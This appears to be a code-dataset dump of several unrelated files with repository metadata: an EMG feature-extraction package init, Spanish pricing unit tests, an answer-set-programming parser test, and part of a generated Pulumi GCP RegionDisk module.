2019-12-04T16:30:40.000Z
|
axopy/features/__init__.py
|
intellsensing/axopy
|
e8c324a4ecfc0abdec3016bca62dcf84d371b6c0
|
[
"MIT"
] | 4
|
2019-10-15T09:20:34.000Z
|
2020-04-10T12:42:01.000Z
|
axopy/features/__init__.py
|
agamemnonc/axopy
|
e8c324a4ecfc0abdec3016bca62dcf84d371b6c0
|
[
"MIT"
] | 3
|
2020-07-09T00:52:28.000Z
|
2022-03-01T16:44:00.000Z
|
from axopy.features.classes import (MeanAbsoluteValue, MeanValue,
WaveformLength, WilsonAmplitude,
ZeroCrossing, SlopeSignChanges,
RootMeanSquare, IntegratedEMG, Var, LogVar,
Skewness, Kurtosis, AR, SampleEntropy,
Hjorth, Histogram)
from axopy.features.time import (mean_absolute_value, mean_value,
waveform_length, wilson_amplitude,
zero_crossings, slope_sign_changes,
root_mean_square, integrated_emg, var, logvar,
skewness, kurtosis, ar, sample_entropy,
hjorth, histogram)
# Public API of axopy.features: class-based extractors first, then their
# function-based counterparts, mirroring the two import groups above.
__all__ = ['MeanAbsoluteValue',
           'MeanValue',
           'WaveformLength',
           'WilsonAmplitude',
           'ZeroCrossing',
           'SlopeSignChanges',
           'RootMeanSquare',
           'IntegratedEMG',
           'Var',
           'LogVar',
           'Skewness',
           'Kurtosis',
           'AR',
           'SampleEntropy',
           'Hjorth',
           'Histogram',
           'mean_absolute_value',
           'mean_value',
           'waveform_length',
           'wilson_amplitude',
           'zero_crossings',
           'slope_sign_changes',
           'root_mean_square',
           'integrated_emg',
           'var',
           'logvar',
           'skewness',
           'kurtosis',
           'ar',
           'sample_entropy',
           'hjorth',
           'histogram']

# FIXME: fix string formatting in docstrings
# Pin numpy's pre-1.14 repr formatting; newer numpy accepts the ``legacy``
# keyword, older versions raise TypeError, which is deliberately ignored.
import numpy
try:
    numpy.set_printoptions(legacy='1.13')
except TypeError:
    pass
| 33.54717
| 79
| 0.477503
| 117
| 1,778
| 7.008547
| 0.487179
| 0.043902
| 0.082927
| 0.121951
| 0.807317
| 0.807317
| 0.807317
| 0.807317
| 0.807317
| 0.807317
| 0
| 0.003012
| 0.43982
| 1,778
| 52
| 80
| 34.192308
| 0.820281
| 0.023622
| 0
| 0
| 0
| 0
| 0.200115
| 0
| 0
| 0
| 0
| 0.019231
| 0
| 1
| 0
| false
| 0.020408
| 0.061224
| 0
| 0.061224
| 0.020408
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e511f72d2333420e79ed1635bd52323434d0583
| 2,676
|
py
|
Python
|
pruebas.py
|
DSAZ1324/ProyectoProgramacionCorte120191
|
6e37c77c03953398f51947374a3e8b3b3bf398bf
|
[
"MIT"
] | null | null | null |
pruebas.py
|
DSAZ1324/ProyectoProgramacionCorte120191
|
6e37c77c03953398f51947374a3e8b3b3bf398bf
|
[
"MIT"
] | null | null | null |
pruebas.py
|
DSAZ1324/ProyectoProgramacionCorte120191
|
6e37c77c03953398f51947374a3e8b3b3bf398bf
|
[
"MIT"
] | null | null | null |
import unittest
import funciones as f
class pruebas(unittest.TestCase):
    """Unit tests for the pricing helpers in the project module ``funciones``.

    Expected values are taken as given; the pricing rules themselves live in
    ``funciones`` (not visible here), so each comment below only restates
    what the assertions imply.
    """

    def test_calcular_precio_producto(self):
        # 1000 -> 1500 suggests a 50% markup over base cost — confirm in funciones.
        self.assertEqual(f.calcular_precio_producto(1000), 1500)
        self.assertEqual(f.calcular_precio_producto(0), 0)

    def test_calcular_precio_servicio(self):
        # 3 -> 300000 suggests 100000 per unit — confirm in funciones.
        self.assertEqual(f.calcular_precio_servicio(3), 300000)
        self.assertEqual(f.calcular_precio_servicio(0), 0)

    def test_calcular_precio_servicio_extras(self):
        # 5 -> 625000 suggests 125000 per extra unit — confirm in funciones.
        self.assertEqual(f.calcular_precio_servicio_extras(5), 625000)
        self.assertEqual(f.calcular_precio_servicio_extras(0), 0)

    def test_calcular_costo_envio(self):
        self.assertEqual(f.calcular_costo_envio(100), 11500)
        self.assertEqual(f.calcular_costo_envio(0), 0)

    def test_calcular_precio_producto_fuera(self):
        # Mixed product + shipping cases, including each argument at zero.
        self.assertEqual(f.calcular_precio_producto_fuera(5000, 50), 13250)
        self.assertEqual(f.calcular_precio_producto_fuera(0, 0), 0)
        self.assertEqual(f.calcular_precio_producto_fuera(5000, 0), 7500)
        self.assertEqual(f.calcular_precio_producto_fuera(0, 60), 6900)

    def test_calcular_iva_producto(self):
        # Rate passed as a fraction (0.19) here, unlike the percent-style
        # (19) used by the other IVA tests — confirm intended asymmetry.
        self.assertEqual(f.calcular_iva_producto(10000, 0.19), 1900)
        self.assertEqual(f.calcular_iva_producto(250000, 0.19), 47500)
        self.assertEqual(f.calcular_iva_producto(0, 0), 0)

    def test_calcular_iva_servicio(self):
        self.assertEqual(f.calcular_iva_servicio(5, 19), 95000)
        self.assertEqual(f.calcular_iva_servicio(0, 0), 0)
        self.assertEqual(f.calcular_iva_servicio(5, 0), 0)
        self.assertEqual(f.calcular_iva_servicio(0, 19), 0)

    def test_calcular_iva_envio(self):
        self.assertEqual(f.calcular_iva_envio(10000, 19), 1900)
        self.assertEqual(f.calcular_iva_envio(100000, 19), 19000)
        self.assertEqual(f.calcular_iva_envio(0, 0), 0)

    def test_calcular_iva_servicio_extra(self):
        self.assertEqual(f.calcular_iva_servicio_extra(5, 19), 118750)
        self.assertEqual(f.calcular_iva_servicio_extra(0, 0), 0)
        self.assertEqual(f.calcular_iva_servicio_extra(0, 19), 0)
        self.assertEqual(f.calcular_iva_servicio_extra(5, 0), 0)

    def test_calcular_recaudo_locales(self):
        self.assertEqual(f.calcular_recaudo_locales(1, 2, 3, 4), 100000)

    def test_calcular_recaudo_horas_extra(self):
        self.assertEqual(f.calcular_recaudo_horas_extra(1, 2, 3, 4), 1250000)
        self.assertEqual(f.calcular_recaudo_horas_extra(0, 0, 0, 0), 0)
        self.assertEqual(f.calcular_recaudo_horas_extra(1, 2, 3, 0), 750000)

    def test_calcular_recaudo_mixto_local(self):
        # TODO: test not implemented yet.
        pass
# Run the test suite when this file is executed directly.
# Bug fix: the original compared __name__ to 'main', which Python never
# sets (direct execution yields '__main__'), so the tests silently never ran.
if __name__ == '__main__':
    unittest.main()
| 41.169231
| 77
| 0.72571
| 378
| 2,676
| 4.825397
| 0.15873
| 0.246711
| 0.263158
| 0.394737
| 0.815789
| 0.770833
| 0.550987
| 0.3125
| 0.089912
| 0.048246
| 0
| 0.088262
| 0.165919
| 2,676
| 64
| 78
| 41.8125
| 0.728943
| 0
| 0
| 0
| 0
| 0
| 0.001495
| 0
| 0
| 0
| 0
| 0
| 0.625
| 1
| 0.25
| false
| 0.020833
| 0.041667
| 0
| 0.3125
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e51e248404e975671dba9c6ca9d775f13970099
| 2,463
|
py
|
Python
|
tests/parser/others.esra.suitcase.a.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/others.esra.suitcase.a.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/others.esra.suitcase.a.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
% Date: Wed, 15 Jul 1998 15:11:06 -0500 (CDT)
% From: Esra Erdem <esra@cs.utexas.edu>
% To: Gerald Pfeifer <pfeifer@dbai.tuwien.ac.at>
% Subject: Re: experimentation
up(L,T1) :- latch(L), next(T,T1), up(L,T), not nup(L,T1).
nup(L,T1) :- latch(L), next(T,T1), nup(L,T), not up(L,T1).
open(T1) :- next(T,T1), open(T), not nopen(T1).
nopen(T1) :- next(T,T1), nopen(T), not open(T1).
up(L,T1) :- latch(L), next(T,T1), toggle(L,T), nup(L,T).
nup(L,T1) :- latch(L), next(T,T1), toggle(L,T), up(L,T).
open(T) :- up(l1,T), up(l2,T).
up(L,0) :- latch(L), not nup(L,0).
nup(L,0) :- latch(L), not up(L,0).
open(0) :- not nopen(0).
nopen(0) :- not open(0).
toggle(L,T) :- latch(L), time(T), not last(T), not ntoggle(L,T).
ntoggle(L,T) :- latch(L), time(T), not last(T), not toggle(L,T).
latch(l1).
latch(l2).
time(0).
time(1).
time(2).
last(2).
next(0,1).
next(1,2).
% find all stable models containing open(2) but not any of the following:
% up(l1,0), up(l2,0), open(0), up(l1,2), up(l2,2)
% compute all {open(2), not up(l1,0), not up(l2,0), not open(0), not
% up(l1,2), not up(l2,2)}
open(2)? %, not up(l1,0), not up(l2,0), not open(0), not up(l1,2), not up(l2,2)?
"""
output = """
% Date: Wed, 15 Jul 1998 15:11:06 -0500 (CDT)
% From: Esra Erdem <esra@cs.utexas.edu>
% To: Gerald Pfeifer <pfeifer@dbai.tuwien.ac.at>
% Subject: Re: experimentation
up(L,T1) :- latch(L), next(T,T1), up(L,T), not nup(L,T1).
nup(L,T1) :- latch(L), next(T,T1), nup(L,T), not up(L,T1).
open(T1) :- next(T,T1), open(T), not nopen(T1).
nopen(T1) :- next(T,T1), nopen(T), not open(T1).
up(L,T1) :- latch(L), next(T,T1), toggle(L,T), nup(L,T).
nup(L,T1) :- latch(L), next(T,T1), toggle(L,T), up(L,T).
open(T) :- up(l1,T), up(l2,T).
up(L,0) :- latch(L), not nup(L,0).
nup(L,0) :- latch(L), not up(L,0).
open(0) :- not nopen(0).
nopen(0) :- not open(0).
toggle(L,T) :- latch(L), time(T), not last(T), not ntoggle(L,T).
ntoggle(L,T) :- latch(L), time(T), not last(T), not toggle(L,T).
latch(l1).
latch(l2).
time(0).
time(1).
time(2).
last(2).
next(0,1).
next(1,2).
% find all stable models containing open(2) but not any of the following:
% up(l1,0), up(l2,0), open(0), up(l1,2), up(l2,2)
% compute all {open(2), not up(l1,0), not up(l2,0), not open(0), not
% up(l1,2), not up(l2,2)}
open(2)? %, not up(l1,0), not up(l2,0), not open(0), not up(l1,2), not up(l2,2)?
"""
| 26.483871
| 81
| 0.559886
| 520
| 2,463
| 2.651923
| 0.109615
| 0.029007
| 0.060914
| 0.052212
| 0.992023
| 0.992023
| 0.992023
| 0.992023
| 0.992023
| 0.992023
| 0
| 0.080828
| 0.176208
| 2,463
| 92
| 82
| 26.771739
| 0.598817
| 0
| 0
| 0.96875
| 0
| 0.28125
| 0.986947
| 0.022737
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
0e7716b0317f11673a59e425e2adbab86abc0266
| 66,569
|
py
|
Python
|
sdk/python/pulumi_gcp/compute/region_disk.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 121
|
2018-06-18T19:16:42.000Z
|
2022-03-31T06:06:48.000Z
|
sdk/python/pulumi_gcp/compute/region_disk.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 492
|
2018-06-22T19:41:03.000Z
|
2022-03-31T15:33:53.000Z
|
sdk/python/pulumi_gcp/compute/region_disk.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 43
|
2018-06-19T01:43:13.000Z
|
2022-03-23T22:43:37.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['RegionDiskArgs', 'RegionDisk']
@pulumi.input_type
class RegionDiskArgs:
def __init__(__self__, *,
replica_zones: pulumi.Input[Sequence[pulumi.Input[str]]],
description: Optional[pulumi.Input[str]] = None,
disk_encryption_key: Optional[pulumi.Input['RegionDiskDiskEncryptionKeyArgs']] = None,
interface: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
physical_block_size_bytes: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
snapshot: Optional[pulumi.Input[str]] = None,
source_snapshot_encryption_key: Optional[pulumi.Input['RegionDiskSourceSnapshotEncryptionKeyArgs']] = None,
type: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a RegionDisk resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] replica_zones: URLs of the zones where the disk should be replicated to.
:param pulumi.Input[str] description: An optional description of this resource. Provide this property when
you create the resource.
:param pulumi.Input['RegionDiskDiskEncryptionKeyArgs'] disk_encryption_key: Encrypts the disk using a customer-supplied encryption key.
After you encrypt a disk with a customer-supplied key, you must
provide the same key if you use the disk later (e.g. to create a disk
snapshot or an image, or to attach the disk to a virtual machine).
Customer-supplied encryption keys do not protect access to metadata of
the disk.
If you do not provide an encryption key when creating the disk, then
the disk will be encrypted using an automatically generated key and
you do not need to provide a key to use the disk later.
Structure is documented below.
:param pulumi.Input[str] interface: Specifies the disk interface to use for attaching this disk, which is either SCSI or NVME. The default is SCSI.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Labels to apply to this disk. A list of key->value pairs.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
:param pulumi.Input[int] physical_block_size_bytes: Physical block size of the persistent disk, in bytes. If not present
in a request, a default value is used. Currently supported sizes
are 4096 and 16384, other sizes may be added in the future.
If an unsupported value is requested, the error message will list
the supported values for the caller's project.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] region: A reference to the region where the disk resides.
:param pulumi.Input[int] size: Size of the persistent disk, specified in GB. You can specify this
field when creating a persistent disk using the sourceImage or
sourceSnapshot parameter, or specify it alone to create an empty
persistent disk.
If you specify this field along with sourceImage or sourceSnapshot,
the value of sizeGb must not be less than the size of the sourceImage
or the size of the snapshot.
:param pulumi.Input[str] snapshot: The source snapshot used to create this disk. You can provide this as
a partial or full URL to the resource. For example, the following are
valid values:
* `https://www.googleapis.com/compute/v1/projects/project/global/snapshots/snapshot`
* `projects/project/global/snapshots/snapshot`
* `global/snapshots/snapshot`
* `snapshot`
:param pulumi.Input['RegionDiskSourceSnapshotEncryptionKeyArgs'] source_snapshot_encryption_key: The customer-supplied encryption key of the source snapshot. Required
if the source snapshot is protected by a customer-supplied encryption
key.
Structure is documented below.
:param pulumi.Input[str] type: URL of the disk type resource describing which disk type to use to
create the disk. Provide this when creating the disk.
"""
pulumi.set(__self__, "replica_zones", replica_zones)
if description is not None:
pulumi.set(__self__, "description", description)
if disk_encryption_key is not None:
pulumi.set(__self__, "disk_encryption_key", disk_encryption_key)
if interface is not None:
warnings.warn("""This field is no longer in use, disk interfaces will be automatically determined on attachment. To resolve this issue, remove this field from your config.""", DeprecationWarning)
pulumi.log.warn("""interface is deprecated: This field is no longer in use, disk interfaces will be automatically determined on attachment. To resolve this issue, remove this field from your config.""")
if interface is not None:
pulumi.set(__self__, "interface", interface)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if name is not None:
pulumi.set(__self__, "name", name)
if physical_block_size_bytes is not None:
pulumi.set(__self__, "physical_block_size_bytes", physical_block_size_bytes)
if project is not None:
pulumi.set(__self__, "project", project)
if region is not None:
pulumi.set(__self__, "region", region)
if size is not None:
pulumi.set(__self__, "size", size)
if snapshot is not None:
pulumi.set(__self__, "snapshot", snapshot)
if source_snapshot_encryption_key is not None:
pulumi.set(__self__, "source_snapshot_encryption_key", source_snapshot_encryption_key)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="replicaZones")
def replica_zones(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
URLs of the zones where the disk should be replicated to.
"""
return pulumi.get(self, "replica_zones")
@replica_zones.setter
def replica_zones(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "replica_zones", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource. Provide this property when
you create the resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
    @property
    @pulumi.getter(name="diskEncryptionKey")
    def disk_encryption_key(self) -> Optional[pulumi.Input['RegionDiskDiskEncryptionKeyArgs']]:
        """
        Encrypts the disk using a customer-supplied encryption key.
        After you encrypt a disk with a customer-supplied key, you must
        provide the same key if you use the disk later (e.g. to create a disk
        snapshot or an image, or to attach the disk to a virtual machine).
        Customer-supplied encryption keys do not protect access to metadata of
        the disk.
        If you do not provide an encryption key when creating the disk, then
        the disk will be encrypted using an automatically generated key and
        you do not need to provide a key to use the disk later.
        Structure is documented below.
        """
        return pulumi.get(self, "disk_encryption_key")
    @disk_encryption_key.setter
    def disk_encryption_key(self, value: Optional[pulumi.Input['RegionDiskDiskEncryptionKeyArgs']]):
        pulumi.set(self, "disk_encryption_key", value)
    @property
    @pulumi.getter
    def interface(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the disk interface to use for attaching this disk, which is either SCSI or NVME. The default is SCSI.

        Deprecated: this field is no longer in use; disk interfaces are
        determined automatically on attachment (a DeprecationWarning is
        raised in ``__init__`` when it is set). Remove it from your config.
        """
        return pulumi.get(self, "interface")
    @interface.setter
    def interface(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "interface", value)
    @property
    @pulumi.getter
    def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Labels to apply to this disk. A map of key->value pairs.
        """
        return pulumi.get(self, "labels")
    @labels.setter
    def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "labels", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the resource. Provided by the client when the resource is
        created. The name must be 1-63 characters long, and comply with
        RFC1035. Specifically, the name must be 1-63 characters long and match
        the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the
        first character must be a lowercase letter, and all following
        characters must be a dash, lowercase letter, or digit, except the last
        character, which cannot be a dash.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter(name="physicalBlockSizeBytes")
    def physical_block_size_bytes(self) -> Optional[pulumi.Input[int]]:
        """
        Physical block size of the persistent disk, in bytes. If not present
        in a request, a default value is used. Currently supported sizes
        are 4096 and 16384; other sizes may be added in the future.
        If an unsupported value is requested, the error message will list
        the supported values for the caller's project.
        """
        return pulumi.get(self, "physical_block_size_bytes")
    @physical_block_size_bytes.setter
    def physical_block_size_bytes(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "physical_block_size_bytes", value)
    @property
    @pulumi.getter
    def project(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the project in which the resource belongs.
        If it is not provided, the provider project is used.
        """
        return pulumi.get(self, "project")
    @project.setter
    def project(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project", value)
    @property
    @pulumi.getter
    def region(self) -> Optional[pulumi.Input[str]]:
        """
        A reference to the region where the disk resides.
        """
        return pulumi.get(self, "region")
    @region.setter
    def region(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "region", value)
    @property
    @pulumi.getter
    def size(self) -> Optional[pulumi.Input[int]]:
        """
        Size of the persistent disk, specified in GB. You can specify this
        field when creating a persistent disk using the sourceImage or
        sourceSnapshot parameter, or specify it alone to create an empty
        persistent disk.
        If you specify this field along with sourceImage or sourceSnapshot,
        the value of sizeGb must not be less than the size of the sourceImage
        or the size of the snapshot.
        """
        return pulumi.get(self, "size")
    @size.setter
    def size(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "size", value)
    @property
    @pulumi.getter
    def snapshot(self) -> Optional[pulumi.Input[str]]:
        """
        The source snapshot used to create this disk. You can provide this as
        a partial or full URL to the resource. For example, the following are
        valid values:
        * `https://www.googleapis.com/compute/v1/projects/project/global/snapshots/snapshot`
        * `projects/project/global/snapshots/snapshot`
        * `global/snapshots/snapshot`
        * `snapshot`
        """
        return pulumi.get(self, "snapshot")
    @snapshot.setter
    def snapshot(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "snapshot", value)
    @property
    @pulumi.getter(name="sourceSnapshotEncryptionKey")
    def source_snapshot_encryption_key(self) -> Optional[pulumi.Input['RegionDiskSourceSnapshotEncryptionKeyArgs']]:
        """
        The customer-supplied encryption key of the source snapshot. Required
        if the source snapshot is protected by a customer-supplied encryption
        key.
        Structure is documented below.
        """
        return pulumi.get(self, "source_snapshot_encryption_key")
    @source_snapshot_encryption_key.setter
    def source_snapshot_encryption_key(self, value: Optional[pulumi.Input['RegionDiskSourceSnapshotEncryptionKeyArgs']]):
        pulumi.set(self, "source_snapshot_encryption_key", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """
        URL of the disk type resource describing which disk type to use to
        create the disk. Provide this when creating the disk.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class _RegionDiskState:
    def __init__(__self__, *,
                 creation_timestamp: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 disk_encryption_key: Optional[pulumi.Input['RegionDiskDiskEncryptionKeyArgs']] = None,
                 interface: Optional[pulumi.Input[str]] = None,
                 label_fingerprint: Optional[pulumi.Input[str]] = None,
                 labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 last_attach_timestamp: Optional[pulumi.Input[str]] = None,
                 last_detach_timestamp: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 physical_block_size_bytes: Optional[pulumi.Input[int]] = None,
                 project: Optional[pulumi.Input[str]] = None,
                 region: Optional[pulumi.Input[str]] = None,
                 replica_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 self_link: Optional[pulumi.Input[str]] = None,
                 size: Optional[pulumi.Input[int]] = None,
                 snapshot: Optional[pulumi.Input[str]] = None,
                 source_snapshot_encryption_key: Optional[pulumi.Input['RegionDiskSourceSnapshotEncryptionKeyArgs']] = None,
                 source_snapshot_id: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None,
                 users: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        Input properties used for looking up and filtering RegionDisk resources.
        :param pulumi.Input[str] creation_timestamp: Creation timestamp in RFC3339 text format.
        :param pulumi.Input[str] description: An optional description of this resource. Provide this property when
               you create the resource.
        :param pulumi.Input['RegionDiskDiskEncryptionKeyArgs'] disk_encryption_key: Encrypts the disk using a customer-supplied encryption key.
               After you encrypt a disk with a customer-supplied key, you must
               provide the same key if you use the disk later (e.g. to create a disk
               snapshot or an image, or to attach the disk to a virtual machine).
               Customer-supplied encryption keys do not protect access to metadata of
               the disk.
               If you do not provide an encryption key when creating the disk, then
               the disk will be encrypted using an automatically generated key and
               you do not need to provide a key to use the disk later.
               Structure is documented below.
        :param pulumi.Input[str] interface: (Deprecated) Specifies the disk interface to use for attaching this disk, which is either SCSI or NVME. The default is SCSI.
        :param pulumi.Input[str] label_fingerprint: The fingerprint used for optimistic locking of this resource. Used internally during updates.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Labels to apply to this disk. A map of key->value pairs.
        :param pulumi.Input[str] last_attach_timestamp: Last attach timestamp in RFC3339 text format.
        :param pulumi.Input[str] last_detach_timestamp: Last detach timestamp in RFC3339 text format.
        :param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
               created. The name must be 1-63 characters long, and comply with
               RFC1035. Specifically, the name must be 1-63 characters long and match
               the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the
               first character must be a lowercase letter, and all following
               characters must be a dash, lowercase letter, or digit, except the last
               character, which cannot be a dash.
        :param pulumi.Input[int] physical_block_size_bytes: Physical block size of the persistent disk, in bytes. If not present
               in a request, a default value is used. Currently supported sizes
               are 4096 and 16384, other sizes may be added in the future.
               If an unsupported value is requested, the error message will list
               the supported values for the caller's project.
        :param pulumi.Input[str] project: The ID of the project in which the resource belongs.
               If it is not provided, the provider project is used.
        :param pulumi.Input[str] region: A reference to the region where the disk resides.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] replica_zones: URLs of the zones where the disk should be replicated to.
        :param pulumi.Input[str] self_link: The URI of the created resource.
        :param pulumi.Input[int] size: Size of the persistent disk, specified in GB. You can specify this
               field when creating a persistent disk using the sourceImage or
               sourceSnapshot parameter, or specify it alone to create an empty
               persistent disk.
               If you specify this field along with sourceImage or sourceSnapshot,
               the value of sizeGb must not be less than the size of the sourceImage
               or the size of the snapshot.
        :param pulumi.Input[str] snapshot: The source snapshot used to create this disk. You can provide this as
               a partial or full URL to the resource. For example, the following are
               valid values:
               * `https://www.googleapis.com/compute/v1/projects/project/global/snapshots/snapshot`
               * `projects/project/global/snapshots/snapshot`
               * `global/snapshots/snapshot`
               * `snapshot`
        :param pulumi.Input['RegionDiskSourceSnapshotEncryptionKeyArgs'] source_snapshot_encryption_key: The customer-supplied encryption key of the source snapshot. Required
               if the source snapshot is protected by a customer-supplied encryption
               key.
               Structure is documented below.
        :param pulumi.Input[str] source_snapshot_id: The unique ID of the snapshot used to create this disk. This value identifies the exact snapshot that was used to create
               this persistent disk. For example, if you created the persistent disk from a snapshot that was later deleted and
               recreated under the same name, the source snapshot ID would identify the exact version of the snapshot that was used.
        :param pulumi.Input[str] type: URL of the disk type resource describing which disk type to use to
               create the disk. Provide this when creating the disk.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] users: Links to the users of the disk (attached instances) in form: project/zones/zone/instances/instance
        """
        if creation_timestamp is not None:
            pulumi.set(__self__, "creation_timestamp", creation_timestamp)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if disk_encryption_key is not None:
            pulumi.set(__self__, "disk_encryption_key", disk_encryption_key)
        if interface is not None:
            # `interface` is deprecated but still honored for backward
            # compatibility: warn first, then store the value.  (The original
            # generated code tested `interface is not None` twice in a row;
            # the two guards are merged here.)
            warnings.warn("""This field is no longer in use, disk interfaces will be automatically determined on attachment. To resolve this issue, remove this field from your config.""", DeprecationWarning)
            pulumi.log.warn("""interface is deprecated: This field is no longer in use, disk interfaces will be automatically determined on attachment. To resolve this issue, remove this field from your config.""")
            pulumi.set(__self__, "interface", interface)
        if label_fingerprint is not None:
            pulumi.set(__self__, "label_fingerprint", label_fingerprint)
        if labels is not None:
            pulumi.set(__self__, "labels", labels)
        if last_attach_timestamp is not None:
            pulumi.set(__self__, "last_attach_timestamp", last_attach_timestamp)
        if last_detach_timestamp is not None:
            pulumi.set(__self__, "last_detach_timestamp", last_detach_timestamp)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if physical_block_size_bytes is not None:
            pulumi.set(__self__, "physical_block_size_bytes", physical_block_size_bytes)
        if project is not None:
            pulumi.set(__self__, "project", project)
        if region is not None:
            pulumi.set(__self__, "region", region)
        if replica_zones is not None:
            pulumi.set(__self__, "replica_zones", replica_zones)
        if self_link is not None:
            pulumi.set(__self__, "self_link", self_link)
        if size is not None:
            pulumi.set(__self__, "size", size)
        if snapshot is not None:
            pulumi.set(__self__, "snapshot", snapshot)
        if source_snapshot_encryption_key is not None:
            pulumi.set(__self__, "source_snapshot_encryption_key", source_snapshot_encryption_key)
        if source_snapshot_id is not None:
            pulumi.set(__self__, "source_snapshot_id", source_snapshot_id)
        if type is not None:
            pulumi.set(__self__, "type", type)
        if users is not None:
            pulumi.set(__self__, "users", users)

    @property
    @pulumi.getter(name="creationTimestamp")
    def creation_timestamp(self) -> Optional[pulumi.Input[str]]:
        """
        Creation timestamp in RFC3339 text format.
        """
        return pulumi.get(self, "creation_timestamp")
    @creation_timestamp.setter
    def creation_timestamp(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "creation_timestamp", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        An optional description of this resource. Provide this property when
        you create the resource.
        """
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
